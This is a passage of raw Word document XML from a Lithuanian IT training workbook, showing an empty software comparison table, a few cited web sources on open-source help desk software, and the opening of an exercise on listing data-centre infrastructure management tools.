                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Aprašas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D65CCCF" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Mokama / Nemokama (sąlygos)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1815C7A7" w14:textId="77777777" w:rsidTr="00621B4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="538" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7920D429" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="77"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1297" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7B782B91" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1781" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4C2C517C" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5B3EECF8" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="670914A1" w14:textId="77777777" w:rsidTr="00621B4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="538" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1699182E" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="77"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1297" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0A414D45" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1781" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="063DF828" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1265D0D4" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7755703C" w14:textId="77777777" w:rsidTr="00621B4B">
        <w:trPr>
          <w:trHeight w:val="70"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="538" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6269467E" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="77"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1297" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7BC24016" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1781" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="662196E8" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="31A7397E" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="172B8407" w14:textId="77777777" w:rsidTr="00621B4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="538" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="23BFA95B" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="77"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1297" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0AD0CFC5" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1781" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="07BF6587" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="54A69EEB" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5527AAFF" w14:textId="77777777" w:rsidTr="00621B4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="538" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7B74AE2C" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="77"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1297" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="464ABF93" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1781" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3CA45254" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="06F737E3" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C808AA" w:rsidRPr="005A5C28" w14:paraId="1F425014" w14:textId="77777777" w:rsidTr="00621B4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="538" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6DD7E6EE" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>..</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1297" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0EC320B1" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1781" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6EC9CCE3" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4EC60F35" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E06D15A" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="769A4B79" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184E62BC" w14:textId="6BFBF49A" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="004A21E3" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Top 10 Open – Source Help Desk Software. Vera P. A. (020, </w:t>
      </w:r>
      <w:r w:rsidR="00402264" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">gruodžio 3). </w:t>
      </w:r>
      <w:r w:rsidR="00402264" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">TechnyV.com. </w:t>
      </w:r>
      <w:r w:rsidR="00402264" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidR="00402264" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId132">
        <w:r w:rsidR="522B8DAE" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.techyv.com/blog/top-10-open-source-help-desk-software/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="122E90DB" w14:textId="5A346780" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00A93E9C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Top Free and Open Source Help Desk Software in 2021. (2021) </w:t>
      </w:r>
      <w:r w:rsidR="00FA714D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Software Suggest. </w:t>
      </w:r>
      <w:r w:rsidR="00FA714D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidR="00FA714D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId133">
        <w:r w:rsidR="522B8DAE" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.softwaresuggest.com/help-desk-software/free-open-source-softwares</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F77CAC5" w14:textId="5A059D64" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C85143" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">41 free, open sourse </w:t>
      </w:r>
      <w:r w:rsidR="004F539B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and top Help Desk Software. </w:t>
      </w:r>
      <w:r w:rsidR="00715B36" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Pat Research. </w:t>
      </w:r>
      <w:r w:rsidR="00477F55" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidR="00477F55" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId134">
        <w:r w:rsidR="522B8DAE" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.predictiveanalyticstoday.com/top-free-open-source-helpdesk-software/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E776ED0" w14:textId="098148FC" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00AB1DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E0FA04" w14:textId="6D8013A0" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="003D0977" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="773E58F4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="773E58F4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>DUOMENŲ CENTRO IR SERVERIŲ KAMBARIO TURTO VALDYMAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE44BBD" w14:textId="3C1EC7FC" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="773E58F4"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UŽDUOTIES SĄLYGA: Suraskite ir pateikite sąrašą programinių įrangų, kurių paskirtis – techninės įrangos, paslaugų, parametrų valdymas, inventorizavimas, pakeitimų fiksavimas. Angl.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Data Center Infrastructure Management tool</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D07F9B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Užpildykite lentelę:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="571"/>
        <w:gridCol w:w="2827"/>
        <w:gridCol w:w="5106"/>
        <w:gridCol w:w="1407"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0FE7A966" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="373A54CC" w14:textId="6B5107DB" w:rsidR="00850702" w:rsidRPr="005A5C28" w:rsidRDefault="773E58F4" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Eil.</w:t>
            </w:r>
            <w:r w:rsidR="000C043E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
